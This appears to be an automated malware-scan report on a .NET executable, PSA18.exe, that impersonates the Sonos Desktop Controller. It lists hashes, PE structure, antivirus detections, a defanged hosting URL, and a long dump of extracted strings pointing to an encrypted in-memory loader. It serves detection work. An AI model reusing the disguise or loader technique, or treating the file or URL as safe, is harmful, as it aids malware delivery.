File details Download PDF Report | |
---|---|
File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
File size: | 235.00 KB (240640 bytes) |
Compile time: | 2018-02-06 23:48:30 |
MD5: | c7f1dbf1184138cd0a6dcf90f4266e01 |
SHA1: | 44eee0ee6b093116a85928c153609c225dfbe4d1 |
SHA256: | 9d3ff871ef83b285922eb40dd4a6c67a40aa5ce2de3d7022c95ae16f70187c1f |
Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Sections 3 | .text .rsrc .reloc |
Directories 3 | import resource relocation |
First submission: | 2018-02-22 00:03:04 |
Last submission: | 2018-02-22 00:03:04 |
Filename detected: |
- PSA18.exe (1) |
URL file hosting |
---|
hXXp://dukhdardhis.com/PSA18.exe![]() |
Antivirus Report | |||
---|---|---|---|
Report Date | Detection Ratio | Permalink | Update |
2018-02-09 18:53:06 | [37/68] | ![]() |
PE Sections 2 suspicious | |||||
---|---|---|---|---|---|
Name | VAddress | VSize | Size | MD5 | SHA1 |
.text | 0x2000 | 0x33fc4 | 212992 | 9ab95598f5c9010bc320d93958ddc725 | ff862b3d6042e66d3630738b237db775cc39d65a |
.rsrc | 0x36000 | 0x6800 | 26624 | 25f180f7e8c589e908245a56876beb5b | a94d102453b46641b8d93f4722bad07f2e351bf4 |
.reloc | 0x3e000 | 0xc | 512 | 73997b3c320caec36d063f42843eed16 | cdf0a487b7e3ebb017378c7cd29243132770fbdc |
PE Resources | |||||
---|---|---|---|---|---|
Name | Offset | Size | Language | Sublanguage | Data |
RT_ICON | 0x3bfe8 | 1128 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
RT_GROUP_ICON | 0x3c450 | 132 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
RT_VERSION | 0x3c4d4 | 772 | LANG_ENGLISH | SUBLANG_ENGLISH_US |
- API Alert
- Anti Debug
Meta Info | |
---|---|
LegalCopyright: | Copyright (C) 2005-2007 |
InternalName: | Sonos |
FileVersion: | 6, 0, 0, 34230 |
CompanyName: | Sonos, Inc. |
ProductVersion: | 6, 0, 0, 34230 |
FileDescription: | Sonos Desktop Controller |
Translation: | 0x0000 0x04b0 |
OriginalFilename: | Sonos.exe |
ProductName: | Sonos Desktop Controller |
XOR | |
---|---|
No XOR informations found in this file. |
Signature | |
---|---|
This file isn't digitally signed |
Packer(s) | |
---|---|
Microsoft Visual C# / Basic .NET | |
Microsoft Visual Studio .NET | |
.NET executable | |
Microsoft Visual C# v7.0 / Basic .NET |
File found | |
---|---|
FIle type: Library | |
mscoree.dll |
IP Found | |
---|---|
No IP detected |
URL(s) | |
---|---|
No URL found |
System.Reflection.Assembly
Sonos, Inc.
VarFileInfo
Sonos Desktop Controller
InternalName
#/bw
System.Security.Cryptography.RijndaelManaged
Invoke
Sonos.exe
Sonos Desktop Controller
TransformFinalBlock
rawAssembly
inputCount
Key
StringFileInfo
Translation
LegalCopyright
FileVersion
VS_VERSION_INFO
Sonos
000004b0
fff3f
Copyright (C) 2005-2007
FileDescription
OriginalFilename
Load
inputBuffer
obj
parameters
CompanyName
ProductName
EntryPoint
6, 0, 0, 34230
3f333
inputOffset
ProductVersion
Z
t$> j
IHUF
i-H]
N7N"NyNqN
]$J6
}ric
"AoR
iO]^
@kS*
X0lh
Int32
|dvs
8tWO~
!xbpW;
3!p
5;_2
* 07
jr L
vj_%
Wk'k4
TabR1x
Nz2MGllWkt4CE
Wh).
yeQ
5gN6N+N NON NrN N&N7N/NVNKN[N%N
slQPn
['m/
aN@
YW6r
Md`.
>6a/0
\9>x
7l/
0*!5Q
Y>r/G
UnverifiableCodeAttribute
MaqYlP
pt0t
>aNGN\NgN)N
<EFS
]999?jdzU+9jc
0
P9[(
n`Z0|
Qai,9
q8j5
+ Y3
E8H6
UZre
F)
m9{~
jLS1
l"?\
p2)(S
J{D9R
peciv;O
EgDuG
-RaX
oK3U-
H-&H%.
r>6y2
t@.x
mG_
n'C\
j0r06
NMNJNGNt
P2z
>v]hR
8VGm{x
N8NPN
32,)j
;9R3
zJ ."
rV/f
aC{%
@Z0O
3e2$
<g !
.j34
)$9H
xkQ'J
x <#j
$>v*=
PQX" |/
AMq\
YLe^
HXnv|
eoH6
_%g9
*p6(
>D$c}
?| J
X^=/
P8LA
E8zA
OT:.
53u
?.a-q
~ .w
sI4-9
m5A!
VQ\}Q
"p?P
U%vH
FS;PH
lB_D
N R
JgjuU
.@wF
(IY0
("ON
D$3d
zo{.
sR>}!
!dCLg
p),Z
q.kNF
System.Security
e?Kc
NN6N;NuN,N
fbtNZ
$AjY
X \
wwwxq
ga=f
Xc$
oM)O
x@_Ak
_kX{-1!
?euK
x6#T
oyH!vKC
F^1D
@mQN g@
lM_
)4k069
Zas7s;s7EE
.4%fg
5@ rt
~vB>
e,$'
||K(?8
>iC4
>A:u
X=:V
:HMyS|
v/|=
zd5,
#yCDkpQkQPL1+
J3,a1MVaIoqQ
v ^%!
8QH(n
1LTT3
@ B
%`\m
G4Q)
Qpfw
{p?A6
@A [
.D"_
3w}%
\rY'6
G@@9999d
=;^;
lL%Lg
r,.S
(Y3,
A4C8O~
Ix3h
i3?S
N#;Dh 1}
T_>,AL
Z@~oz
2f7[
0Z;E
"1BB[o*
fPE#
NUN N(NhN/NZN{N1N
H>oX(
@AJ u
AppDomain
^M;3
ygf`f
Sw[<G)dU
5Yp
1'iE8jq%
y%4nN
qlH@
hlxK%l
get_CurrentDomain
|m0x>
YXP^
CRM`iz
5CScN
<tq<
o:-Rw
Tq6Z
C+|/a/`7
SP "
}xTdMT/
1>h~
'%m.
p1FU
e~Am
5PQ0
p dK
p<:U
{F+*
!vW9
+:'nP|
^7t\
%?CZp$
B,l_
>ODD
F?e1
5O:
vl~V
gDk:
A^.<
A, _
f_,Y
7;O:O:U} Zs
\~2~.
7:HR
9hR7]
c (1
= 4$
rz8S_
`r sK
t*fk
/EPh
b{%d
NN6N;NuN,No
( *@sc_
I.^~
k 8r
# ~~
O+7k
wwwq
3<q8<u>
6Xuo6
_6fMN
>L 0
z2 C
o67Kb
#Blob
^yxa
DZ6:
get_Message
S.rH
% H@
<*lo3
I9G,C|
r7q>n
6y&O#
hYy3G
>h&#
-F}G
J?e>b
vV;M
R452S443J***?
YFF(W%
pa$$D
9OFC
d&d}
jG|,jy
:z}H
3#I
R?_^
)`!L
Type
d Ju
[MXpf
<sd7
'N*1
5e!# :b
joqtvusiA8
!\l+
%U%Oc
/TJCk
Z\}
!;4sc
[Lh
ejn
67pJ
a:~ ~4
"o$cD
v:{"
OuAMG
u^~r
DLa%
Join
S1?'+G2
AtG
VT?=
OEdvs
A&J"N
mfa
7!BvD
d^c"
L:YT
CWf+
TTS'
4QuI
MNXK
/2xl
<]<)X
>/H:4
vVr!
WQVK
y.C
~_A9
AA@h,,,G
fmk
7l?T
5<Eeb
qP0h
ony
q4)\
GetValue
]zom
P5|`8
}wn?L
"Ee_c
_V E
s F`
OVF5/
PkBN
iiKi
S+,yA
6.?0
8Jc,
#$!G
U9G}b[
PRkP
-puX
Ad^x-
0+)e aWS
a(@]
/o {
A/5
l3NN
MK9|
}HGny}
=j_
3.TD
$ [B5
Oq}"
Uc}v M
7*{E+_
}]LAd
_XAI/1
[a(K
}siW
&|*j
2%anL-
p'ZK
RED` v
>XLB
tgaN
N]N N[N7N
Fh `X
KZc
Exception
DialogResult
qWin2G
.text
2+LU
qW-F
N[wK
F[E>
m=%N90`C
0\KO*
1ceQ
"PGF
GF@ddjd
sxx:
GetObject
v?]~m
i~}!
y@PH2S
~_Ps&
+>sR
$mM"]
:)<=
{^e#W
A}$2
$D,|U
aG%0
{[WY0:|
Pg]X
/7 8
kz)\`
NKN7N
p0sa
M 09^
"28.
k%G,
*j_
SkipVerification
G9c[
8QR_,
%AB+$
VBh
zzUU
)!{[
he-A
NV=1?
H!iE
V %*?
0+Si
+v!F
@+Cz.dv
,Y9^
NoNLNcNXN$NINXNzNKNeNAN
$h&
a]jo
CgL
lF6
!Kr^ib
2cV/
Gb(G
_|l
2;>
fQUXS1<
NNVL
p*^%
N)N=N
k<F
"!#=!!!%
Zo^UzBy
@V-K
rZv A
GetCallingAssembly
JML9
ixi{Z
rM|Q
7DvO$
%{s=
7K'g1`
$Z3 R
"$cv
Ip_A
"9'L;3
W.eL
.3f4W
wyNf
^s33Hm
{EfI>
,YNy
dj&!
.O$>
1DLb
{WHc`
Ntg"
g'JImrw
Y(#H|
G b
yQ~v
8j7qw%
W1_\
pizd
#|_ xv
?N".
P7]@
Ka95
4<BUWDBXi*
7p_@
~V ry
&@?B$ng
tv~:9)
Cc:'
CTX_
dBN
Pl1ur
?^Su
iN}^
.h=V
>g-.
()<!
C8mw
37BwK6PfwcNEHBZSV
P0
P`L=
lIKN
9G .
jh 2
L/\e
yZv3
gIOl
c5p)
;!'!
N&N<NjNqNpN NCN
[<[^Zl
VE&j;
C*<
'wG)
ozJy
ws\k
nh5K
_ogk
wALo0i
Fgy
|| ([E
A bzT
ugl
Z/R N
M*hb
P{m-
,3U*;
%fc
{z"M
zRiO
PC@(1
/ys)
RD_x
0q9-
7/gF
#=g~
5<@B^+
pFBa=
Weat
qeuTL7-
sHES
s9#5
f%IY
X>k.6
0!y$a>
b5S2!
#5C-E2
L@{9w
jjjd?
_Fg.%N
H<.N
|v&i
_Sz&
Pm(b.
/OG
\XfW
cyxSMq&_C
Y`hg
ax-|9
YZSC7778 &
'$t
M@i3
cPSH
w[0<
NaGJ
nfKN
/Ut
W]!r-
)0YX
#W{6s
<bN8N[NcNaN(N
F'#(,
JYo*
MB{;
ryil
3PO=
oe\.
yNZP
O')p
Fc36
y H?
{!vO
F (
:xW:
#s&@1
blT_
W!z5
6wf's]^
eh*
*JG~
&Ou/
JZa-
rA6r
lm*F
|jaG
RLqkI4
7&Un^
System.Windows.Forms
P!
\{'f
3g[Pa
37Do
r F_r1
NKR
]j7
l^pw
&:,0
+!6r^
08[`
U>*0
As+L
`w\LJ
Ppz{}]
!K>I
6ki0
dk@^
Kr%+U
<CU9
VcYZ
*Cx$k
vfeV9kzi90
NlX_>
#_D
XsBVV
stpt
&X Z
P! l
Z<'^
/7 &
Ch
zh9P
/4Zz
6<</
V=Ls~
^ x|
A<Vm]o
Gfd_"
<eB=
$}bh8
p`&bj
`UK\qF
(j$Bm
("#u
Q 5
XA(~lu
(X<)
v<
M!NE
=Ag6
ltvV
:h!_
k+,
R4]t
x]!2
6 /v8
"$!yo
f:%T|
+gg(
m,ws
:VL0
h5
oQGNsv4JTyBe8o
b+2M1
o_/vk6
hQUf'
/o7P
S7p~=
ud 3(
6<<]
`&q
8~1\%
Nv0X
/-
skhJ
v+(b
Qx2~
[v;+
2&_t9W
WIo-
H`hO
''O9b
System
u23DW
-jVh
n@o7
p{s3
4=y.
d_F|
"DbI
i-WB/e
,+++"
q_+WF
,O2K=
S3/^EO
i08?
+ObX0
40C'
X=JDC
dj@
#${i
rZ6JEh
T#9
N)N4N%NTNrN
8vgp
{/q
q9k>
nTQ#
q{<zNVw
CreateInstance
o12F
DhRm
oqC6
aL@9
toZ>o
#Strings
-DCp-
)ygK
K9
yl/E
kxc+
6~ k
>?8
"@-*[
d":H
3m6TQ
&@|?
Hiy}LC
B}#;v>
%1X1m
5p62g ^
swju
/IB!7
<]C9
iMu|d}
6F65_
eV#Qv
11oI56h65YICv9
%V]?F&'
9zXr|
0E&?
@K8m
/+KC;
Z&+Is
#!,#cIV
/%$GV
Z}+r.
"PP`
O;`R
x[bF
9(<n
H?41
ME'p
[K v
`8aUv
+PH
e{S
>wa\,W
4.x
>>>Z
;WNmMX
;6-M<P3
-6(NA
qs P
yCWd+
7 #X
+'@6
q}8
hMCF5m
fv~S}
q8
NdNVNmN(N_NGN N1Na
i0AC
Pg$N
cXYp
GetType
NjU7q
8nx
L{=d
f LsY
drn^
$v9)
o_@/
}`Pqfo
+6 F
RAkU)
NDNVN\NlNSN3
+c rn+
Activator
so-0
k-_O
@B_HP
WZtVX
\LV?
GW@
~.xN
j{5
r6EWBY
S2(5
dUM!P
]sUG4
6PKHn
knqONNLJJG=>9
i]NpjO
jQ|]
I{WMU
`'u[
$Cg:
Va$!R
=DD#_>~Q
S~|4
mG7m
, km
3ip*I
R$ur'
3kj$
k.{s
usdw
zAYb
v.8#W_
,0G
k#2u$
NqNGN)NDN+N
3C=s0
[9>mT
=[/(
w}''
pn 7
xrU1M
P{w8
LZX[D
X&\SM
RwG<k
t:eE
z~Sh
l-*1
(/;t
k!6s
qA`T f
v=<t
pVZH
v+BJh
m>byt
Z")f;
N&N0N
LJBp
_6P/v
qu+
-25K
7+ G
7c\Y
V\HJ
L21d
9K
sF30T
x``,
uo#h m
Szn9
}1:x2
OgJt
E]W)
mA<~A
&tCvS
Zh-Px
886M
=Wb>q
Z?w
j%Vp
V _s
1W (g
iehr8S
6\%>
N'N6N
R a)>B
n|(k
V'jy
7V(b
[1f
B-Tz}
*7X}ru
2EU@
0G 9y
2D~q `
mTPz
I,;RU
WW#
u_
H/oV
E0b[
VVUUV
w'I5
IV^ZzX3
-M\\
Vp["o <
8o, 0W
N=NnN
kuz8\'
x9 G
*Jy15
C6kWT
S_#!
Oy]Qr"
`j(-
8[kv{
<^Py
k>K}{M
1LhQU
beJ6
*`Yq
c.-lt
>4?:
p8N%
v8'z
Y$fB
-%>!6
'lL
C"J(
Dp'3
g26}
Jnh?
t%;a
tWN
jTu|
!*},
MjL^
?fTV
b68C
\`Eo
-met
;BMQ
5P D
LjWgJpgpoYhFPAmZkYv
U]9d
CHK-
hx@v
&St2
3NYd
X=<:>`-
(D=)
KPNQTcnprsrpi?
b1/S
op\
a5y5
2BMU
H4k,! .
& %|L
0SfGh5
`z(d
TYNt
ZWvd
_"T9^
JflW
1)Q~m
CKKG
=Iv6
2T`+
H Z4
AicP3
#H.
c5 s
]'7
(*+N
(>v-
LJ&G
?!>s*
Af1Pa45EPsYV
2r/\
YPrZ
K+Qy
lC,Cn
<i.y
y-8&
N~SW
;xzA
Xa*P
[xew
,]Re
N`N.NaN6N
mn A
)_3l
bSVh
~65J
1K<q
yg_u
mY )
`p|$
$D9F
I"|o)
9R3
ji k
{/v
7 T
vL*u
n)U#
T$v`V
^PE5
32KSA
5bfiT3#kj
`fE|
ET76'
xdhae
^ *:
rq%
5lC}
dbLL
x50H
!eY[
jt-"
8!}
4zOw
h01y
pEqi
S?ayl
YO<A
$^Z+
jN4x
MiRg3L7OBk7yqbSau2Y
A|"|\/
w.2YiK
j;B~i{
vak?
{C0 ]
qPy8\
fEl}
{#hr
RbJ
U _;!r
./)N***?
NANIN NjNfN
jjj?2
D0H0
xd1TC
yl%8u
a2wC
LeCj6
X \x
N}UbT$@N
> igO
K3T5
V$U(
)ZTz
8+U_-*p
P
Q0,n
3{FE
Ny+XbHC
'3Tr
De7-Ck
hu<yW
D`X]
sonV
d..d
xzm`
n3@3
`u!/cE
z}%\
_]'
mwV`o
)&?#
NJN#N^D
yneWzj\
j'WR
-uHzg|:
NfN0NRN;N^N
[zoE
Gv>zF8
(}<1
.g+t
;n)K
*=sH#
P0V[zb
5 3
~~}K
A^p
0DHC=gi*
VW)&u/
3H X
AP)\
BM-4 G
3i>}
9Tw\}
O on|$
U6l`
Z6^b
NY/n
Xdh
KH]s))(B
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
Hv-$
+UUg
W '4\U
N)N3NMNYNIN
.lq+ -
!wUN
.$&)
/nEj
NrU8
=\ P
-^9!
D^F
J-vhV
Qe.8
Id8CK=a
j\CC=
Fv1
Z 5:
[0 ^b
t'dl
j|'*
9c/x$
U&t#-v
,\d
K/ZL
2/5
gx7pa
7.\c?j
WG4|
|OYzP
kj.~
.{(VNA
S?^z'
[x920:
^Nf1
6:A^
4: i
563\
|oWQ
D67G
7DT
OBaM
tWn/
EIAj
noX9
z/%l
wtgc
e$}
LnYK
:o~YQ
wwxwq
XUxa
zwB3
fOE
kr2LziFtqfB92y4
lomi'(R]
IP"oO
@E{!
LateBinding
$hY_d
ku$,.aDy
0/n
NTN6NvN4NtN9NzNeNlN
9x/I
F_T
7Fs
NaN0N{NqNN
>\P~W
I,%d4
u> ^
M%sR
K*rF
h^uv
d.B$
/V<'H
YZ?
vX7`
.ctor
|%;ki
B&~*
*=~Y
X@}Ys
=& 9E_
NVy"
rD#NU
F2`Qe?;
:myQ
yA_`
NNNsNmN%N
@ :"
)c1j_^
XZP{
y`D {
V`TF
wwwq}
x1)F2
I;Hd
Txz[s
MH%}:
!X~
oz$c
]#@w-/
C,JM
95!]
YAH*
en t
yk 9
^ )D
o$xyb
K0^F2
6V_K
z rT
)!Ro
*#/L
!kL{
cCu_9
*7RX
7eEA
L_ '
MessageBox
(M4!*
&TN5
3,9%
)%?=
Bge
g9DD
egK 0
[Q>+
m 6l(f:
`-Kf
|MqWa
/#09f
mD"lU7}_
2! &2,
UDy>E
\#!=
p[(h
?I8<
oa3[
W;V-E
M6zGF2
TAH V
@ls$
J]K
%;0,
]$%=
@.reloc
H)yq'
yl|aY
Kavb]
{0Pd
QWJ,
zJE#
j'I9&
tF>
=A#b
Y7^\
Fm2*B$
t{ RBc
s,N
U`Eu
Byte
2O^@
k".o
b>(E
N%+W
WrapNonExceptionThrows
*ba
d^&
k1&r
1L4xU
NwNoNKN6U
?/<x)
IVi
F,*u*
/q _
0Ue^
\ \@
Vdjd
*M T
!x/I;
aSDzbGn
hf/4
&+>s0
='^j%Rd
xz
wuR6
`D)_
Le-4
ozm'
o)rq9
f(}gA
R>]J
|')6
1<cF
s9wP{&
97?kv
-8TQt
/H/!W
JMPTamqsxxyrW)
F_9
|$"j
5#8*v
}@eY
!]=dAo
6<AE?f*
zsCN2
j|SM1
$tm*b
99}O
LMFK+++8
dM #
\System.String[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089PAk
yXI9(
w;7qR0P
)324
rN2|
v,+<
++9@G
JE-
+{:z
k2XAs 0
>8=a|
O"VD/^g
!w@G
BD"$
11kXnsKSry8
\wZN]kj2h
YCE2>
?vV6i
*z$+
r2,Qn
Yuh?B
uQ\
T.
h@zV
w_%C
jdVU+
];c]
-Rb/-=!
Nw^R+
98Tjp
9XJ
X{?
5"~@U
,H =U
3^?j}
*fm[_
RuntimeCompatibilityAttribute
dfWL
_~d6
v5][
z]ug!AMk{
5]M8
Assembly
2#]'
NHN5NpN
qW)7
.resources
IL1v
<2Fp
nVlR
EeY+)
Microsoft.VisualBasic.CompilerServices
u|kq|u
*$7>MlBw
#?l2
5l^>V|
zo5%
>_tm
yXuv
V+*1
Y8L4#
;G,H$I
)>la
;pAL
+]j@@??d
!=#<R
52}>
O{<}E
9%y/Q
P}7tP
j!i&1
mS&W
*OY'0
|c @
k8.o
fnw
![ wy&A
'zFl
z`An
@6&No
<#N+
1#c/
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
MfQ`2
2=F?@2)
4<J/A
YAme
E2y
jjd?
w}@LE
7owoG
w;@K
p#q.E
N|NDN
NwNoNKN
Di5'
vXOw
|l|
\3qo8
apeSE
Y3 q
(Sg
V~d
FB8R,q
_M7u
~ B',-
M,"+
)mdd
hnzF
v.V#=]6DQ
y*no
J5]z,Tn2
9%YdC
xL/8
Mr-o
Resize
Zs%G
N+9,C
Y8[pf
%H(><
Oi#B
aRYV
$Sv(
1@9bL'
Y7WU
i0B>
i>X/o
tz3(
|7;J
2&&&P
VV8y
d}1i
O3*9
==&_WK
r Qp
V(9i
y$]@
[h3&
z{oK
M|
k(VYz%
bY?1~@0
&(D_
K$g{
:{/
{f9C
"K/
BIU$-
78>,%$
0`aY
8'v
X %`c
!Fj_
wwwx
7Nm:)
4NLW9
)f6{
e=NdzA
we!/
v?+@
Rr^P
QV:1t
j_9
8KDKI+
si_B
QGh 1R":
#klW
KjB
2w'
lwzC14
v~hp
v8Y|-7
$],0S^
4<ATUWDA[k*
7uu
G?qe
&W:+
|Q{)
<PIZ o
{G#P
D9h}
lP1>
oB65CMBAfwcTn4wn
X$H
>EFP
ResourceManager
Show
,"~86
WZk
mF#<~
TODc
| 2.
LxJ*
ivJ6
2#Oh396
'W9-}x
Qi|
\# w
5qOc+
l#!aZTR<
tW"Z8
Iz
~lc-
CBLy111M (
snx_
&Gs
npB3/
{*q:S
(I&u
jQz9
u@Ng
qd{[
W$I6_s
/'^:
?i4>
N}NFN~N
k5$
_tqs
OFI
E$zX
#$)&
ZgM,[F
P(ZF
DI;b
!\@q
ng:p
2o( E
qqCT>
ndNNNKJIHCA?;
VGE
"8kY
vZ)a
3K=6
Tu{\P}Qu
`O=H
;9WS`
<Rv(
ug^
,m<
P/|L
f!o*
,LN(
lKmt
t,U!>
Bc0k
G "5
i&F7
Dn{e
pTS.
/TXF
gfPuoE
, Nh4X
kq7a
ba/3
oO@
x's>
>\@Jp
wdC
7jB
+63n
\]f<V
0(Ja@
umIYb
RP,)
BwSV?
Z(]r
1%R(
*["]
ZI6O#
5g|9
&8j]
Ie/}
tr)
|eR+
\L?,
X.2;
l(PGe
bg 5J
yW=K
|q! J
vnx3@D
>1r#
"tS4
TDnm
e!S
P/5[
S=cd
H,C^b
sTMK
D;be
A./B
*r>MN
JtZ)^6
|Pp
=H%
N&NANDN N NON
d ?MC
0ZV
\q L
]5 q[
_Z@l
;}/ki f
30E%
q^_
W%NP
3.I0
67NlNiN)N]N*N|NLN8N4N`NzN N=NONEN1N
muWa
5"T.7
Yt},
NMN;N0NyNaNHN
F Lb
IRC
SsW
+_B
yLLLI
k,>L8
k7S&,,
N8"M
}M[#8
?p9*)
-S-CV
|gQ8
WeEv
B'S:
&N!L
\MQ
-w&m
4E+i
Me#:
bkF4
a^Kf
FL?<
(e`{
S_ }^
#ul1
<H-j
s6srwosF6efsIh6
?nlSc
MgV"
2vh4
@1b0
.FW^nsxs]8'
g+,V
dTF
$QF]P
U #m ,
Wc|s,
.?Xx,x
HOn^Z
[]q=
1+He
N2NSN
@RR!
%z.{
=+U B
bY/%
62DFN
A)7[a<
y!?=
$U$E8
IJh7BW5jwi5RE
}tYQ
tpZA
U]o6
mscorlib
b)Fv
7- G
g/:/
VTS
ahFQ
mLvMW
0@RU
k,|t
{}lL
v{saN
ZOL{
o"7g
| rZ
,vo,N
:Bz_
1WQ0
tZQ o
3fVLDeq
X(tW
kOnap
!y#g<$
vt|2e
<2oa}
ar#!]
n Yd
1dNS
e}=c
jj@9
Y x5
*fLJ
0xrJ
A3%H
jVG/
[Qy7
r8yJhl
@>f'
v,;+
w<31
^plt
3F(Nm
System.Reflection
iWZ9
|&q{
2xcZVi
t5?}
>|/'|
Qx^0dv
4;\A
w} W
80'@d
v\n;}
"/GY
-eI lI
xwcm
^R}}>
LfU
MjVITEw9UdlQC4EohQh
XYtB
oeQ+
a$
B*"a
B[* #
"{ -
||O)
Q1U 1T
tLnr
{T D
F?C!s
8s=PZG
f(bt
QQ!_e
)'^l
ZZZ"
pYn
UAdcV$
F q1
`sbP
YD5
g8St
q V*
jj@jj@9
1dS7
dMTw
F)|;
NpN[N
Juia
/ogX
& m :cm
mf!#I
gUK`
FRJk
^`rz
L6o?
G~n8
9@?9?
ZmVA
Zi'73
`iZF`1t
*pP>3
X?-yL<
}%`H
[e~w^
='E
:B`dO
) 3$
mWlFC@
@mF
G kt
!waH
vtPT}
a (G
HM4E
@OJR
4<BVGBD^*
2 '
jDqi
Sij>
4gN6N+N NON NrN N&N7N/NVNKN[N%N
Cy'V
8(H$
NDN<N%NbNuNyN~NTNdN
BL,]Y
R'9
O&*C$!f0
cw[E
0];T
r;|~2
K|m'fx
% W&
A<tR
yR'.
s;cA
zZLd
dBZ'
)'aM
~U(|
Q 61
B |w
J ==
92_{,
5iub/
DcNNNQTa`gg^[X;
([ ?
W_Ve
?u2!"x"
kr,wsW
uA?<\
#fn:n
VDM-
i}y=!N
In5@
jR7Wsv
j$Xz
{1Nl0D*Q
@g~BR
38ST
eh]F[
P Eo
%>GP
yi[d
xcZ;
d
]0>^m
Y?t*
Yzj7
om100\X
SguS
dhz
f?.
3<kh
5A(7R1
"94!b
u4OE
!This program cannot be run in DOS mode. $
CK,AV
7 n
Mh$
9DC}
&muOZ
\WN]
K{ N]w5
%hnjV
j. e
Wp<e
M%zy
noCJ
&b?d
O'yi
_,IHL
FD3 @
;Fj3
5%aw
t9)!<
*)-9d
"" f
M2f(
@<R_
=1eJ
Kkqe
\`0|
%K-u
&2wU
yMi\
;bYy
yg,C*
~(Cd
>e'-
P 6
e|<9E
^7Csv
:= RL
@<R'
mTf
RS~Yl
!sx u
<8 '
LateGet
zs,n}
Jy9SA
U:-:5
3!a-v
`n^:zw`
"OSR
#GUID
Gppi
NV{,7
N~On
V 9R
.,7N
+|k+
5y[*
fg[~H<
8;wn
N!N;NzN%NBN
m<
,iCO
1I:x
)iW+
k-HeV
hi9
%9.T
F{&}
:#B=
[n62
BSJB
y6y
Fl|L
(i;B
S97Rjt
n]6}
Pt<d
u<vz
F/&@z
igcV{
@C?O
@@>m>>=\%%%B
~O!P
WmsS
T6b
0!B$y
<qu[a
wsf
} )
?aNGN\NgN)N
=2<|
NeNXNWNsN
br9
0#}%
cJ39p
lpc"
f +u:2
wq*1q(
njh\
S.gx
)J[B3K
*~E`E{
UV>
F~N9
e}KV
;N 3
0"GZ
-zVcd*$
YUt
Sw!V
1c@*
;^Ei
)iqxv#
1{FdFe
<<8W
<+Z6<
: NqNEN
HT%vi
\+L98
NJup1jjbCvnAkBpI9
[ 5f
HCcA
W " A
)9@R
275]
]w0`*
cs.3]
*@kL+U'
Hj;e
DGi-
U={
7W1+u
FA^6
\UF9
D9B}
7zG|[
N.N]NNN~N N
,!_ 0
>~gL
g#xR
eT\z
v+R@
vg:'
bIN0
N?NGNNN
N3N8NLNlN
A6ue
5ucU
DS(_B
:hQA
GS2n
KVvvc
ei,s
u{R
g9}^
~tcK
fVW3FhU
|o(x+
~_+P
w4cd
m\#
_~6x5
0;NS]
R~Ky~
V9>L
jHhVfCN5OF3Ma6
>D,a
# U8A
.^0
rd]I
dLZ4e
:`fQ
G)J
5SRZ^
B}Slc
%z;q
*^Lz
9#b*
g$l[
"mjf
GetProperty
mos-
] l|
U75zy
.sea
jjjj@9
Pp|h
9H}m
U\*!e
lt]L
#aXLD
N^NHN|N
@w(
${;P&
SB:U
oTQz
A*|t%&o
Fioe
N_N!N
c.ba
UnvJ
4R_w6
z=C@12
AYt?p
3[ 0
s}0X
5}A|
RT~81*
7mUs
9?tJ
-lA}k
nn\[
JVXPk
(/e;
NXNTN%N+N<NXNWN
ZnSu
6UrMv
';KJR
lc.e
N{NIN
,}qOu
VGBX
<CMA
\i(g
40I"
p[+^}5
6`F
SRrJ
G@@@@@dd
hyN6zM
4a:z&
bRD7
@ #HP
vM}
>X<N
|R&c
DHXggeN
HQ9?
?jR;qC
iCp%
<.!:(&
CompilationRelaxationsAttribute
?}*J
dm9\`Vaw
www
yaE!
TLTe
kR`xe
D<d;
wwxq
[$e S
f7i4
n|Fhgxm_
baVhvSYOce
Mby#O
LF@A
%Ba{
SqybH
J^6+
*KO[?m
d{='~
[tbzk
&y~A
AXA2
7|dk
($z
Z%2`I
Array
dx?f
`>9%
zQt.
)*:k
N'NzN`NwN
wwwwwq
_!B^
p'yl
,[hK$7y;
7_1}'
~yd(
D{EOO
NZNN
N Os
`1sj
Kx--
GF]5
A#9Q
o0|W
N|NAN;N#NPNUNcNIN
rb5U>
=qw
LLs
6k Kr
)%3R
(]j%
1wFU
.&ZlW
\4JH
8eb8
E\-Z
vIN~E
q1'9
XnIv
1 '|h
N[7n
~1L
rl`tK6p
"On@v
~:VO,
3HlK
8 _;
"aD
<dDD
*+N%NYN
IeNsbT
}@Fh'
9hatMfr3PfkLFrmBe7R
:qYn
?]8e
tzT$l
N}|_
o ]D
'` f
{`{"
.HE5
s\gG
qYr}
A|=,"
ehU_
iM?
=. Z
E!UV
!EDv
hM*
++N%NYN
d8A`_
PbWD
)!)U
]0O
apcL/
nI:|G
AF 9
40|_
2gM*
q{DL
y{a\
tSTQ
)5n
i@!7
~eg"
2 KeZ
fy-r
nMaQwI
vI`5$
1
1/-
"6a*
Y>dk
n$G_
ZMLmD@
I29We6w5TJ17Y5u
xVw@
njp:}
xP"}
Hbd]3JJJ0
6rrY
4H
yM6H>
zM~-E
,xK2Q
0rQMF
9i8ncf
,u8;
6'"mD
_H(3=U
Wi{)
.0}%
P ci\<
y* 1B
fX%U
QMvQTTtXk8vRURQu0U
Qkw"
MA0&M
CZ!f
'Ha-
>[(
K zo$
l|t?
UOaGck
K9qZ
z>!9sp|e
4%r6
z8Bg
wwwy
|%)u
w/k8q
ZU$Y
u* x
rS/
yI*g
4Usu
=8Ic
*@j
dScP
iIuW<[
d9}R
Lr8;
LkAV
-veq
#IU"*
W%
System.Resources
K'6l;(
XncU
SRr%X'
>C4u
VI&Q
i?y(
W;my
{A._h
a i4y
^| J%{^}
3yMBJ
hXLI
F[e<
xw,z
XRLR%gT
| w\
N9Gd
BD{(
7a=R
:0D}
:t\,.
S(j>
}@ U
."*]
_/0.c
@D,,
qoMCHamD
QqQb
+#lb
YPV|%D$
Hvk8h
Le &\
LP20
!<Se
8|i>
1IbF
=u$%
E=h4
Iiq`
iu5K
Wi }
Syx"
FjQ":
PT:Y
^@{.6
Mnf[
s^H8j
N^-2
L"c0
wwwwq
$Pju
i:X
L$o[
B(m)!`
@Ld0
b.
aDc~
g&cs
+xEp+
&Hj
Lm,$
|Foa]
V |*!
L6D>t
s;53
U mCT
+VFF@?9
Twdw5
